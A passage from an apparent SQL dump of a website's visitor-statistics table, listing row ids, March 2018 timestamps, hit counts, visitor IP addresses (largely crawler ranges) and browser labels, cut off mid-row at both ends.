1,0,0,'54.36.148.56','other'),(215759,1520280645,1,1,0,0,'54.36.148.28','other'),(215760,1520281071,1,1,0,0,'54.36.148.80','other'),(215761,1520281094,1,0,1,0,'66.249.66.155',''),(215762,1520281163,1,1,0,0,'54.36.149.36','other'),(215763,1520281230,1,1,0,0,'54.36.148.126','other'),(215764,1520281299,1,1,0,0,'87.250.224.46','other'),(215765,1520281554,1,1,0,0,'54.36.148.115','other'),(215766,1520281686,1,1,0,0,'54.36.148.165','other'),(215767,1520281773,1,1,0,0,'54.36.148.22','other'),(215768,1520281783,1,1,0,0,'54.36.148.86','other'),(215769,1520281811,1,1,0,0,'54.36.148.236','other'),(215770,1520282009,1,1,0,0,'54.36.148.229','other'),(215771,1520282150,1,1,0,0,'54.36.148.207','other'),(215772,1520282328,2,2,0,0,'141.8.142.74','other'),(215773,1520282461,1,1,0,0,'54.36.149.103','other'),(215774,1520282642,1,1,0,0,'54.36.149.56','other'),(215775,1520282742,1,1,0,0,'54.36.148.109','other'),(215776,1520282776,1,1,0,0,'54.36.149.38','other'),(215777,1520282810,1,1,0,0,'54.36.148.98','other'),(215778,1520282900,1,1,0,0,'54.36.149.0','other'),(215779,1520283088,1,1,0,0,'8.29.198.27','other'),(215780,1520283090,1,1,0,0,'216.244.66.237','other'),(215781,1520283176,1,1,0,0,'54.36.148.145','other'),(215782,1520283443,1,0,1,0,'66.249.66.157',''),(215783,1520283536,2,0,2,0,'66.249.66.155',''),(215784,1520283597,1,1,0,0,'40.77.167.85','other'),(215785,1520283629,1,1,0,0,'54.36.148.58','other'),(215786,1520283730,1,0,1,0,'66.249.66.156',''),(215787,1520283735,1,1,0,0,'54.36.148.132','other'),(215788,1520283759,1,1,0,0,'54.36.148.20','other'),(215789,1520284211,1,1,0,0,'54.36.148.41','other'),(215790,1520284289,1,1,0,0,'54.36.148.45','other'),(215791,1520284545,1,1,0,0,'54.36.148.213','other'),(215792,1520284614,1,0,1,0,'66.249.66.157',''),(215793,1520284624,1,0,1,0,'66.249.66.155',''),(215794,1520284726,1,1,0,0,'54.36.149.61','other'),(215795,1520284842,1,1,0,0,'54.36.148.179','other'),(215796,1520285333,1,1,0,0,'54.36.148.49','other'),(215797,1520285457,1,1,0,0,'54.36.148.207','other'),(215798,1520285802,1,1,0,0,'54.36.148.244','other'),(215799,1520285881,1,1,0,0,'54.36.148.48','other'),(215800,1520285903,1,1,0,0,'54.36.148.57','other'),(215801,1520285927,1,1,0,0,'54.36.148.183','other'),(215802,1520286072,1,1,0,0,'217.69.133.11','other'),(215803,1520286093,1,1,0,0,'54.36.149.72','other'),(215804,1520286260,1,1,0,0,'54.36.148.68','other'),(215805,1520286722,1,1,0,0,'54.36.148.146','other'),(215806,1520286889,2,2,0,0,'88.99.19.242','other'),(215807,1520286897,1,1,0,0,'178.93.223.102','firefox'),(215808,1520287041,1,1,0,0,'54.36.148.198','other'),(215809,1520287245,1,1,0,0,'54.36.149.26','other'),(215810,1520287275,1,1,0,0,'54.36.149.79','other'),(215811,1520287527,1,1,0,0,'66.249.66.76','chrome'),(215812,1520287633,1,1,0,0,'66.249.66.157','chrome'),(215813,1520287796,4,4,0,0,'54.165.59.7','other'),(215814,1520288041,67,67,0,0,'147.135.128.113','other'),(215815,1520288434,1,1,0,0,'87.250.224.46','other'),(215816,1520288627,1,1,0,0,'54.36.149.94','other'),(215817,1520288848,1,0,1,0,'66.249.66.76',''),(215818,1520288945,48,48,0,0,'147.135.128.113','other'),(215819,1520289030,1,1,0,0,'217.69.133.231','other'),(215820,1520289062,1,1,0,0,'54.36.148.37','other'),(215821,1520289116,1,1,0,0,'54.36.149.19','other'),(215822,1520289275,1,1,0,0,'54.36.149.55','other'),(215823,1520289301,1,1,0,0,'40.77.167.85','other'),(215824,1520289355,1,1,0,0,'180.76.15.12','other'),(215825,1520289356,2,0,2,0,'66.249.66.199',''),(215826,1520289436,1,1,0,0,'54.36.148.61','other'),(215827,1520289531,1,0,1,0,'66.249.66.201',''),(215828,1520289533,1,0,1,0,'66.249.66.195',''),(215829,1520289621,1,0,1,0,'66.249.66.157',''),(215830,1520289891,1,1,0,0,'54.36.148.82','other'),(215831,1520289941,1,1,0,0,'54.36.148.24','other'),(215832,1520289952,1,1,0,0,'54.36.149.49','other'),(215833,1520289953,1,1,0,0,'54.36.148.133','other'),(215834,1520290238,1,1,0,0,'54.36.148.169','other'),(215835,1520290263,1,1,0,0,'217.69.133.59','other'),(215836,1520290371,2,2,0,0,'91.196.178.168','chrome'),(215837,1520290478,1,1,0,0,'180.76.15.161','other'),(215838,1520290689,1,1,0,0,'54.36.148.58','other'),(215839,1520290834,1,1,0,0,'54.36.148.80','other'),(215840,1520291010,1,1,0,0,'178.154.171.88','other'),(215841,1520291030,3,0,3,0,'66.249.66.195',''),(215842,1520291168,1,1,0,0,'54.36.148.93','other'),(215843,1520291641,1,1,0,0,'54.36.148.117','other'),(215844,1520291708,1,1,0,0,'54.36.148.187','other'),(215845,1520291974,1,1,0,0,'54.36.148.131','other'),(215846,1520292128,1,1,0,0,'54.36.148.223','other'),(215847,1520292280,1,1,0,0,'66.249.66.157','chrome'),(215848,1520292307,1,1,0,0,'54.36.149.72','other'),(215849,1520292533,1,1,0,0,'54.36.148.43','other'),(215850,1520292703,1,1,0,0,'54.36.148.16','other'),(215851,1520293193,1,1,0,0,'66.249.66.157','chrome'),(215852,1520293200,1,1,0,0,'216.244.66.237','other'),(215853,1520293227,1,1,0,0,'66.249.66.199','chrome'),(215854,1520293275,1,1,0,0,'54.36.148.48','other'),(215855,1520293819,1,0,1,0,'66.249.66.201',''),(215856,1520293926,1,1,0,0,'8.29.198.27','other'),(215857,1520293999,1,1,0,0,'54.36.148.78','other'),(215858,1520294184,1,1,0,0,'217.69.136.205','other'),(215859,1520294368,1,1,0,0,'54.36.148.190','other'),(215860,1520294516,2,2,0,0,'78.111.186.254','chrome'),(215861,1520294532,1,1,0,0,'54.36.149.100','other'),(215862,1520294609,1,1,0,0,'54.36.148.15','other'),(215863,1520294619,2,2,0,0,'54.36.148.255','other'),(215864,1520294699,1,1,0,0,'54.36.148.17','other'),(215865,1520294702,1,1,0,0,'54.36.148.18','other'),(215866,1520294736,1,1,0,0,'54.36.148.97','other'),(215867,1520294849,1,1,0,0,'217.69.133.241','other'),(215868,1520294852,1,1,0,0,'54.36.148.217','other'),(215869,1520294870,1,1,0,0,'54.36.148.172','other'),(215870,1520294921,1,0,1,0,'66.249.66.201',''),(215871,1520294925,1,1,0,0,'54.36.148.119','other'),(215872,1520295089,1,1,0,0,'141.8.142.74','other'),(215873,1520295094,1,0,1,0,'66.249.66.195',''),(215874,1520295127,1,1,0,0,'54.36.148.211','other'),(215875,1520295421,1,1,0,0,'217.69.136.206','other'),(215876,1520295493,1,1,0,0,'54.36.149.41','other'),(215877,1520295511,1,1,0,0,'54.36.148.222','other'),(215878,1520295677,1,1,0,0,'54.36.148.106','other'),(215879,1520295928,1,0,1,0,'66.249.66.199',''),(215880,1520295929,1,1,0,0,'54.36.149.33','other'),(215881,1520295936,1,1,0,0,'54.36.149.89','other'),(215882,1520296233,1,1,0,0,'54.36.148.117','other'),(215883,1520296371,1,1,0,0,'54.36.149.37','other'),(215884,1520296456,1,1,0,0,'54.36.149.102','other'),(215885,1520296586,1,1,0,0,'54.36.148.231','other'),(215886,1520296653,1,1,0,0,'54.36.148.206','other'),(215887,1520296717,1,1,0,0,'54.165.59.7','other'),(215888,1520296760,1,1,0,0,'54.36.149.17','other'),(215889,1520296809,1,1,0,0,'87.250.224.46','other'),(215890,1520296867,1,1,0,0,'54.36.148.59','other'),(215891,1520297044,1,1,0,0,'54.36.148.237','other'),(215892,1520297217,1,1,0,0,'54.36.148.217','other'),(215893,1520297287,1,0,1,0,'66.249.66.158',''),(215894,1520297313,1,1,0,0,'141.8.142.74','other'),(215895,1520297401,1,1,0,0,'217.69.133.218','other'),(215896,1520297799,1,0,1,0,'66.249.66.201',''),(215897,1520297876,1,1,0,0,'217.69.133.228','other'),(215898,1520297993,1,1,0,0,'54.36.149.32','other'),(215899,1520297995,1,1,0,0,'54.36.148.70','other'),(215900,1520298022,1,1,0,0,'40.77.167.85','other'),(215901,1520298409,1,1,0,0,'54.36.149.94','other'),(215902,1520298598,1,1,0,0,'54.36.148.167','other'),(215903,1520298619,1,1,0,0,'54.36.149.83','other'),(215904,1520298935,1,1,0,0,'141.8.142.74','other'),(215905,1520299168,1,1,0,0,'180.76.15.26','other'),(215906,1520299422,1,1,0,0,'54.36.148.83','other'),(215907,1520299503,1,1,0,0,'54.36.148.102','other'),(215908,1520299518,1,1,0,0,'54.36.148.174','other'),(215909,1520299703,1,1,0,0,'54.36.148.40','other'),(215910,1520299799,1,1,0,0,'54.36.148.145','other'),(215911,1520299836,1,0,1,0,'66.249.66.195',''),(215912,1520299849,35,35,0,0,'66.70.219.76','other'),(215913,1520299859,2,0,2,0,'66.249.66.199',''),(215914,1520299938,1,1,0,0,'91.209.11.236','other'),(215915,1520299998,1,1,0,0,'54.36.148.202','other'),(215916,1520300031,1,1,0,0,'54.36.148.220','other'),(215917,1520300045,1,1,0,0,'54.36.148.89','other'),(215918,1520300207,1,1,0,0,'87.250.224.46','other'),(215919,1520300351,2,2,0,0,'54.36.149.59','other'),(215920,1520300542,3,0,3,0,'66.249.66.201',''),(215921,1520300547,1,1,0,0,'54.36.149.0','other'),(215922,1520300585,1,1,0,0,'54.36.148.73','other'),(215923,1520300815,1,1,0,0,'54.36.149.94','other'),(215924,1520300834,1,1,0,0,'54.36.148.67','other'),(215925,1520300988,1,1,0,0,'54.36.149.99','other'),(215926,1520301195,1,1,0,0,'54.36.148.224','other'),(215927,1520301498,1,1,0,0,'54.36.148.113','other'),(215928,1520301521,1,1,0,0,'54.36.148.48','other'),(215929,1520301618,1,1,0,0,'54.36.148.104','other'),(215930,1520302042,1,0,1,0,'66.249.66.157',''),(215931,1520302218,1,1,0,0,'66.249.66.156','chrome'),(215932,1520302245,1,1,0,0,'66.249.66.199','chrome'),(215933,1520302258,1,1,0,0,'54.36.148.14','other'),(215934,1520302418,1,1,0,0,'54.36.149.39','other'),(215935,1520302895,2,0,2,0,'66.249.66.201',''),(215936,1520303001,1,1,0,0,'217.69.133.249','other'),(215937,1520303674,1,1,0,0,'40.77.167.85','other'),(215938,1520303677,1,1,0,0,'54.36.148.46','other'),(215939,1520304541,1,0,1,0,'66.249.66.199',''),(215940,1520304704,1,1,0,0,'54.36.148.85','other'),(215941,1520304711,1,1,0,0,'141.8.142.74','other'),(215942,1520304717,1,1,0,0,'178.154.171.88','other'),(215943,1520304759,1,1,0,0,'8.29.198.25','other'),(215944,1520304866,1,1,0,0,'54.36.148.131','other'),(215945,1520304997,1,1,0,0,'54.36.148.12','other'),(215946,1520305019,2,0,2,0,'66.249.66.195',''),(215947,1520305023,1,1,0,0,'54.36.148.226','other'),(215948,1520305840,1,1,0,0,'54.36.148.136','other'),(215949,1520305875,1,1,0,0,'54.36.148.111','other'),(215950,1520305936,1,1,0,0,'54.36.148.66','other'),(215951,1520305957,1,1,0,0,'54.36.148.123','other'),(215952,1520306136,1,1,0,0,'54.36.148.225','other'),(215953,1520306158,1,1,0,0,'141.8.142.74','other'),(215954,1520306279,1,1,0,0,'54.36.149.5','other'),(215955,1520306718,1,1,0,0,'54.36.148.167','other'),(215956,1520306762,1,1,0,0,'54.36.148.212','other'),(215957,1520306891,1,1,0,0,'217.69.136.203','other'),(215958,1520307332,1,1,0,0,'54.36.148.134','other'),(215959,1520307379,1,1,0,0,'54.36.148.224','other'),(215960,1520307799,2,2,0,0,'141.8.142.74','other'),(215961,1520307813,1,1,0,0,'66.249.66.157','chrome'),(215962,1520307816,1,1,0,0,'54.36.149.86','other'),(215963,1520307818,2,1,1,0,'66.249.66.199',''),(215964,1520307877,1,1,0,0,'54.36.148.141','other'),(215965,1520307973,2,0,2,0,'66.249.66.201',''),(215966,1520308008,1,1,0,0,'54.36.148.16','other'),(215967,1520308060,1,1,0,0,'54.36.148.204','other'),(215968,1520308077,1,1,0,0,'66.249.66.195','chrome'),(215969,1520308165,1,1,0,0,'66.249.66.199','chrome'),(215970,1520308358,1,1,0,0,'54.36.148.145','other'),(215971,1520308562,1,1,0,0,'54.36.148.177','other'),(215972,1520308767,1,1,0,0,'54.36.148.197','other'),(215973,1520309202,1,1,0,0,'87.250.224.46','other'),(215974,1520309486,1,1,0,0,'54.36.148.69','other'),(215975,1520309529,1,1,0,0,'54.36.148.137','other'),(215976,1520310185,1,1,0,0,'34.224.2.110','other'),(215977,1520310662,1,1,0,0,'178.154.171.88','other'),(215978,1520311190,2,0,2,0,'66.249.66.195',''),(215979,1520311219,1,1,0,0,'54.36.148.128','other'),(215980,1520311281,1,0,1,0,'66.249.66.199',''),(215981,1520311969,1,1,0,0,'54.36.148.145','other'),(215982,1520312001,1,0,1,0,'66.249.66.201',''),(215983,1520312049,1,1,0,0,'54.36.148.22','other'),(215984,1520312231,2,2,0,0,'141.8.142.74','other'),(215985,1520312389,1,1,0,0,'54.36.148.76','other'),(215986,1520312453,1,1,0,0,'40.77.167.173','other'),(215987,1520312693,1,1,0,0,'54.36.148.134','other'),(215988,1520312870,1,1,0,0,'216.244.66.237','other'),(215989,1520313204,1,1,0,0,'66.249.93.204','chrome'),(215990,1520313663,1,1,0,0,'54.36.148.53','other'),(215991,1520313672,1,1,0,0,'54.36.149.23','other'),(215992,1520313685,1,1,0,0,'54.36.149.81','other'),(215993,1520314187,1,1,0,0,'54.36.148.245','other'),(215994,1520314383,1,1,0,0,'54.36.148.178','other'),(215995,1520314501,1,1,0,0,'91.196.177.46','chrome'),(215996,1520314730,1,0,1,0,'66.249.66.201',''),(215997,1520314864,1,0,1,0,'66.249.66.156',''),(215998,1520314967,1,1,0,0,'54.36.148.61','other'),(215999,1520315054,1,1,0,0,'54.36.148.187','other'),(216000,1520315355,1,1,0,0,'54.36.149.102','other'),(216001,1520315563,1,1,0,0,'217.69.133.224','other'),(216002,1520315593,1,1,0,0,'8.29.198.27','other'),(216003,1520315646,1,1,0,0,'40.77.167.85','other'),(216004,1520315772,1,0,1,0,'66.249.66.195',''),(216005,1520315910,1,1,0,0,'54.36.148.93','other'),(216006,1520315988,1,1,0,0,'54.36.149.84','other'),(216007,1520316037,1,1,0,0,'54.36.149.38','other'),(216008,1520316081,1,1,0,0,'217.69.133.68','other'),(216009,1520316247,1,1,0,0,'54.36.148.28','other'),(216010,1520316304,1,0,1,0,'66.249.66.201',''),(216011,1520316347,1,1,0,0,'54.36.149.30','other'),(216012,1520316494,1,1,0,0,'217.69.133.193','other'),(216013,1520316506,1,0,1,0,'66.249.66.157',''),(216014,1520316513,1,0,1,0,'66.249.66.199',''),(216015,1520316742,1,1,0,0,'178.154.171.88','other'),(216016,1520316881,2,2,0,0,'77.111.244.38','chrome'),(216017,1520317310,1,1,0,0,'54.36.148.189','other'),(216018,1520317422,1,1,0,0,'54.36.148.251','other'),(216019,1520317497,1,1,0,0,'141.8.142.74','other'),(216020,1520317709,1,1,0,0,'54.36.148.59','other'),(216021,1520318216,1,1,0,0,'54.36.149.16','other'),(216022,1520318219,2,2,0,0,'91.196.178.80','chrome'),(216023,1520318293,1,1,0,0,'54.36.148.230','other'),(216024,1520318451,1,1,0,0,'216.244.66.237','other'),(216025,1520318697,1,1,0,0,'66.249.66.157','chrome'),(216026,1520318700,2,1,1,0,'66.249.66.195',''),(216027,1520318753,1,1,0,0,'54.36.148.164','other'),(216028,1520318769,1,1,0,0,'40.77.167.65','other'),(216029,1520318894,1,1,0,0,'54.36.149.97','other'),(216030,1520318965,1,1,0,0,'141.8.142.74','other'),(216031,1520319546,1,1,0,0,'54.36.149.64','other'),(216032,1520320198,1,1,0,0,'54.36.148.86','other'),(216033,1520320426,1,0,1,0,'66.249.66.195',''),(216034,1520320428,2,2,0,0,'213.111.82.159','chrome'),(216035,1520320517,1,1,0,0,'54.36.149.106','other'),(216036,1520320687,2,0,2,0,'66.249.66.199',''),(216037,1520320699,1,1,0,0,'54.36.149.25','other'),(216038,1520320712,2,1,1,0,'66.249.66.195',''),(216039,1520320732,1,0,1,0,'66.249.66.158',''),(216040,1520320749,1,1,0,0,'54.36.148.32','other'),(216041,1520321072,1,1,0,0,'54.36.148.202','other'),(216042,1520321185,1,1,0,0,'217.69.133.218','other'),(216043,1520321309,1,1,0,0,'188.166.101.66','chrome'),(216044,1520321630,1,1,0,0,'54.36.148.55','other'),(216045,1520322079,1,1,0,0,'54.36.149.102','other'),(216046,1520323109,2,2,0,0,'195.230.119.34','chrome'),(216047,1520323132,1,1,0,0,'54.36.149.101','other'),(216048,1520323158,1,1,0,0,'91.196.178.104','chrome'),(216049,1520323448,1,1,0,0,'91.209.11.236','other'),(216050,1520323494,2,2,0,0,'130.180.220.250','chrome'),(216051,1520323522,2,2,0,0,'91.196.178.80','chrome'),(216052,1520323650,1,1,0,0,'95.134.203.34','firefox'),(216053,1520323682,1,1,0,0,'217.69.136.207','other'),(216054,1520323838,1,1,0,0,'54.36.149.2','other'),(216055,1520323992,1,1,0,0,'217.69.133.13','other'),(216056,1520324018,2,1,1,0,'66.249.66.199',''),(216057,1520324021,1,1,0,0,'66.249.66.156','chrome'),(216058,1520324216,1,1,0,0,'54.36.148.186','other'),(216059,1520324346,2,2,0,0,'91.196.178.162','chrome'),(216060,1520324361,1,1,0,0,'54.36.149.48','other'),(216061,1520324420,1,1,0,0,'54.36.149.30','other'),(216062,1520324445,2,0,2,0,'66.249.66.201',''),(216063,1520324503,1,1,0,0,'162.210.196.98','other'),(216064,1520324637,1,1,0,0,'54.36.148.97','other'),(216065,1520324640,1,1,0,0,'54.36.149.60','other'),(216066,1520325002,1,1,0,0,'178.154.171.88','other'),(216067,1520325166,1,1,0,0,'37.9.113.182','other'),(216068,1520325419,2,0,2,0,'66.249.66.195',''),(216069,1520325571,1,1,0,0,'195.10.210.49','chrome'),(216070,1520325601,1,0,1,0,'66.249.66.157',''),(216071,1520325671,1,1,0,0,'54.36.148.39','other'),(216072,1520325726,1,1,0,0,'54.36.148.128','other'),(216073,1520325814,1,1,0,0,'54.36.149.74','other'),(216074,1520325886,1,1,0,0,'54.36.148.47','other'),(216075,1520325946,1,1,0,0,'78.111.187.156','msie'),(216076,1520326277,2,2,0,0,'54.36.149.10','other'),(216077,1520326288,1,1,0,0,'54.36.148.148','other'),(216078,1520326331,1,1,0,0,'54.36.149.82','other'),(216079,1520326371,1,1,0,0,'54.36.149.42','other'),(216080,1520326432,1,1,0,0,'8.29.198.25','other'),(216081,1520326799,1,1,0,0,'204.236.214.143','opera'),(216082,1520326844,1,1,0,0,'54.36.148.14','other'),(216083,1520327419,1,1,0,0,'54.36.148.190','other'),(216084,1520327557,1,1,0,0,'54.36.148.101','other'),(216085,1520327812,2,2,0,0,'91.196.178.93','chrome'),(216086,1520327869,2,2,0,0,'95.134.39.135','chrome'),(216087,1520328072,1,0,1,0,'66.249.66.195',''),(216088,1520328112,1,1,0,0,'54.36.148.250','other'),(216089,1520328181,1,0,1,0,'66.249.66.201',''),(216090,1520328257,1,1,0,0,'103.212.146.76','other'),(216091,1520328375,1,1,0,0,'54.36.149.82','other'),(216092,1520328410,1,1,0,0,'54.36.148.149','other'),(216093,1520328584,1,1,0,0,'54.36.148.12','other'),(216094,1520328920,1,1,0,0,'54.36.148.92','other'),(216095,1520328922,1,1,0,0,'54.36.148.211','other'),(216096,1520329092,1,1,0,0,'54.36.148.98','other'),(216097,1520329144,1,1,0,0,'54.36.149.26','other'),(216098,1520329214,2,1,1,0,'66.249.66.201',''),(216100,1520329218,1,1,0,0,'66.249.66.158','chrome'),(216101,1520329344,1,1,0,0,'54.36.148.127','other'),(216102,1520329461,1,1,0,0,'185.126.252.155','chrome'),(216103,1520329704,1,1,0,0,'95.134.97.244','chrome'),(216104,1520329737,2,2,0,0,'54.36.148.62','other'),(216105,1520330043,1,1,0,0,'54.36.149.81','other'),(216106,1520330419,1,1,0,0,'54.36.149.104','other'),(216108,1520330482,1,1,0,0,'54.36.148.82','other'),(216109,1520330678,1,1,0,0,'54.36.149.88','other'),(216110,1520330761,1,1,0,0,'54.36.149.61','other'),(216111,1520331227,1,1,0,0,'130.180.212.129','msie'),(216112,1520331317,1,1,0,0,'54.36.149.28','other'),(216113,1520331664,1,1,0,0,'54.36.148.141','other'),(216114,1520331905,1,1,0,0,'54.36.148.165','other'),(216115,1520332294,1,1,0,0,'54.36.148.145','other'),(216116,1520332408,1,0,1,0,'66.249.66.201',''),(216117,1520332546,1,1,0,0,'46.211.158.218','chrome'),(216118,1520332771,1,1,0,0,'54.36.148.97','other'),(216119,1520332803,1,1,0,0,'180.76.15.157','other'),(216120,1520332809,1,1,0,0,'54.36.149.30','other'),(216121,1520332966,1,1,0,0,'54.36.148.73','other'),(216122,1520333238,1,1,0,0,'54.36.149.3','other'),(216123,1520333919,2,2,0,0,'178.154.171.88','other'),(216124,1520334120,2,0,2,0,'66.249.66.195',''),(216125,1520334293,1,0,1,0,'66.249.66.201',''),(216126,1520334382,1,1,0,0,'54.36.149.52','other'),(216127,1520334489,2,2,0,0,'141.8.142.74','other'),(216128,1520334543,1,1,0,0,'217.69.133.84','other'),(216129,1520334598,1,0,1,0,'66.249.66.156',''),(216130,1520334625,1,1,0,0,'217.69.133.222','other'),(216131,1520334772,1,1,0,0,'217.69.133.230','other'),(216132,1520334795,1,1,0,0,'66.249.66.195','chrome'),(216133,1520334798,1,1,0,0,'66.249.66.156','chrome'),(216134,1520335166,1,1,0,0,'54.36.148.50','other'),(216135,1520335335,1,1,0,0,'54.36.148.85','other'),(216136,1520335346,1,1,0,0,'217.69.133.238','other'),(216137,1520335679,1,1,0,0,'54.36.148.46','other'),(216138,1520336045,1,1,0,0,'141.8.142.74','other'),(216139,1520336141,1,0,1,0,'66.249.66.195',''),(216140,1520336216,4,4,0,0,'134.249.146.125','chrome'),(216141,1520336352,1,1,0,0,'178.154.171.88','other'),(216142,1520336410,1,1,0,0,'54.36.149.18','other'),(216143,1520336643,1,1,0,0,'54.36.148.136','other'),(216144,1520336960,1,1,0,0,'54.36.148.12','other'),(216145,1520337299,1,1,0,0,'8.29.198.27','other'),(216146,1520337516,1,1,0,0,'54.36.148.205','other'),(216147,1520337627,1,1,0,0,'54.36.149.57','other'),(216148,1520337636,1,1,0,0,'91.196.178.131','firefox'),(216149,1520337731,1,1,0,0,'54.36.148.245','other'),(216150,1520337762,1,1,0,0,'178.154.171.88','other'),(216151,1520337807,1,1,0,0,'54.36.149.52','other'),(216152,1520337871,1,1,0,0,'54.36.148.91','other'),(216153,1520337903,1,1,0,0,'54.36.149.101','other'),(216154,1520337913,1,1,0,0,'54.36.148.199','other'),(216155,1520338320,1,1,0,0,'54.36.149.14','other'),(216156,1520338416,1,1,0,0,'217.69.133.253','other'),(216157,1520338421,1,1,0,0,'54.36.148.250','other'),(216158,1520338443,1,1,0,0,'54.36.148.206','other'),(216159,1520338715,1,1,0,0,'54.36.148.191','other'),(216160,1520338749,1,1,0,0,'40.77.167.13','other'),(216161,1520338823,1,1,0,0,'54.36.149.71','other'),(216162,1520339020,1,1,0,0,'178.154.171.88','other'),(216163,1520339118,1,1,0,0,'54.36.148.238','other'),(216164,1520339206,1,1,0,0,'54.36.148.97','other'),(216165,1520339449,1,1,0,0,'54.36.148.92','other'),(216166,1520339528,1,1,0,0,'141.8.142.74','other'),(216167,1520339632,2,2,0,0,'130.180.220.191','chrome'),(216168,1520339663,1,1,0,0,'31.43.31.222','chrome'),(216169,1520339781,1,1,0,0,'54.36.149.38','other'),(216170,1520339929,1,0,1,0,'66.249.66.199',''),(216171,1520339981,3,1,2,0,'66.249.66.201',''),(216172,1520339984,1,1,0,0,'66.249.66.156','chrome'),(216173,1520340100,44,44,0,0,'173.212.253.47','other'),(216174,1520340184,1,1,0,0,'217.69.133.68','other'),(216175,1520340385,1,1,0,0,'54.36.148.155','other'),(216176,1520340485,1,1,0,0,'54.36.149.101','other'),(216177,1520340812,1,1,0,0,'141.8.142.74','other'),(216178,1520341120,1,1,0,0,'54.36.149.58','other'),(216179,1520341175,1,0,1,0,'66.249.66.201',''),(216180,1520341468,1,1,0,0,'54.36.149.63','other'),(216181,1520341885,1,1,0,0,'54.36.148.126','other'),(216182,1520342052,1,1,0,0,'54.67.59.131','chrome'),(216183,1520342198,2,2,0,0,'141.8.142.74','other'),(216184,1520342217,1,0,1,0,'66.249.66.199',''),(216185,1520342226,1,1,0,0,'54.36.148.27','other'),(216186,1520342342,1,0,1,0,'66.249.66.195',''),(216187,1520342500,1,1,0,0,'185.208.208.198','other'),(216188,1520342515,1,1,0,0,'178.154.171.88','other'),(216189,1520342708,1,1,0,0,'54.36.148.222','other'),(216190,1520342942,1,1,0,0,'95.132.2.158','firefox'),(216191,1520342970,1,1,0,0,'37.55.28.46','chrome'),(216192,1520342996,1,1,0,0,'176.120.99.194','chrome'),(216193,1520343223,1,1,0,0,'54.36.149.101','other'),(216194,1520343398,1,1,0,0,'54.36.148.128','other'),(216195,1520343643,1,1,0,0,'195.46.32.225','chrome'),(216196,1520343825,1,1,0,0,'77.111.244.60','chrome'),(216197,1520343833,1,1,0,0,'54.36.148.64','other'),(216198,1520343845,1,1,0,0,'54.36.148.51','other'),(216199,1520343878,1,1,0,0,'77.111.244.34','chrome'),(216200,1520344016,1,1,0,0,'95.132.2.158','firefox'),(216201,1520344051,1,1,0,0,'54.36.148.88','other'),(216202,1520344217,1,1,0,0,'178.154.171.88','other'),(216203,1520344423,1,1,0,0,'54.36.149.9','other'),(216204,1520344465,1,1,0,0,'54.36.149.64','other'),(216205,1520344509,1,1,0,0,'54.36.148.126','other'),(216206,1520344561,1,1,0,0,'54.36.148.48','other'),(216207,1520344580,1,1,0,0,'54.36.148.82','other'),(216208,1520344585,1,0,1,0,'66.249.66.195',''),(216209,1520344664,1,1,0,0,'54.36.149.76','other'),(216210,1520345021,1,0,1,0,'66.249.66.156',''),(216211,1520345095,1,0,1,0,'66.249.66.158',''),(216212,1520345118,2,2,0,0,'92.112.125.243','chrome'),(216213,1520345131,1,1,0,0,'217.69.133.30','other'),(216214,1520345158,1,1,0,0,'54.36.148.45','other'),(216215,1520345249,1,1,0,0,'54.36.148.14','other'),(216216,1520345266,1,1,0,0,'66.249.66.195','chrome'),(216217,1520345271,1,1,0,0,'66.249.66.156','chrome'),(216218,1520345390,1,1,0,0,'54.36.148.218','other'),(216219,1520345533,1,1,0,0,'54.36.149.77','other'),(216220,1520345607,1,1,0,0,'54.36.148.185','other'),(216221,1520345701,1,1,0,0,'78.8.231.158','chrome'),(216222,1520346206,1,1,0,0,'92.112.125.243','chrome'),(216223,1520346297,1,1,0,0,'46.161.9.39','firefox'),(216224,1520346642,1,0,1,0,'66.249.66.201',''),(216225,1520347096,2,2,0,0,'141.8.142.74','other'),(216226,1520347794,1,1,0,0,'37.73.242.18','chrome'),(216227,1520347864,2,2,0,0,'178.154.171.88','other'),(216228,1520348094,1,1,0,0,'54.36.148.46','other'),(216229,1520348152,1,1,0,0,'8.29.198.25','other'),(216230,1520348199,1,1,0,0,'54.36.148.171','other'),(216231,1520348272,1,1,0,0,'54.36.148.15','other'),(216232,1520348295,1,1,0,0,'92.112.125.243','chrome'),(216233,1520348352,1,1,0,0,'54.36.149.75','other'),(216234,1520348537,1,1,0,0,'54.36.148.13','other'),(216235,1520348605,1,1,0,0,'54.36.149.64','other'),(216236,1520348690,1,1,0,0,'40.77.167.65','other'),(216237,1520348933,1,1,0,0,'54.36.148.143','other'),(216238,1520349144,2,2,0,0,'141.8.142.74','other'),(216239,1520349190,1,1,0,0,'54.36.149.56','other'),(216240,1520349268,1,1,0,0,'54.36.148.53','other'),(216241,1520349281,1,1,0,0,'54.36.148.216','other'),(216242,1520349449,1,1,0,0,'54.36.148.166','other'),(216243,1520349636,1,0,1,0,'66.249.66.199',''),(216244,1520349855,1,1,0,0,'54.36.148.38','other'),(216245,1520350051,1,1,0,0,'54.36.148.203','other'),(216246,1520350209,1,0,1,0,'66.249.66.201',''),(216247,1520350563,1,1,0,0,'217.69.133.253','other'),(216248,1520350706,1,1,0,0,'66.249.66.201','chrome'),(216249,1520350708,1,1,0,0,'66.249.66.157','chrome'),(216250,1520350710,1,1,0,0,'141.8.142.74','other'),(216251,1520350975,1,1,0,0,'54.36.148.106','other'),(216252,1520351147,1,1,0,0,'54.36.148.143','other'),(216253,1520351421,1,1,0,0,'54.36.149.25','other'),(216254,1520351480,2,2,0,0,'87.250.224.46','other'),(216255,1520351836,2,2,0,0,'92.113.175.202','chrome'),(216256,1520352150,1,1,0,0,'54.36.148.85','other'),(216257,1520352216,35,35,0,0,'66.70.219.76','other'),(216258,1520352227,1,1,0,0,'91.196.178.73','firefox'),(216259,1520352342,1,1,0,0,'54.36.148.169','other'),(216260,1520352659,1,1,0,0,'54.36.149.2','other'),(216261,1520353066,1,1,0,0,'188.230.43.254','other'),(216262,1520353197,1,1,0,0,'54.36.148.243','other'),(216263,1520353429,1,1,0,0,'54.36.148.28','other'),(216264,1520353861,1,1,0,0,'54.36.149.63','other'),(216265,1520353968,1,1,0,0,'54.36.149.37','other'),(216266,1520354097,1,1,0,0,'54.36.148.173','other'),(216267,1520354174,1,0,1,0,'66.249.66.158',''),(216268,1520354423,1,1,0,0,'54.36.148.100','other'),(216269,1520354499,1,1,0,0,'54.36.148.245','other'),(216270,1520354551,1,1,0,0,'54.36.149.12','other'),(216271,1520354869,1,1,0,0,'54.36.148.134','other'),(216272,1520354964,1,1,0,0,'54.36.148.36','other'),(216273,1520355221,1,1,0,0,'54.36.149.10','other'),(216274,1520355270,1,1,0,0,'54.36.149.2','other'),(216275,1520355277,1,1,0,0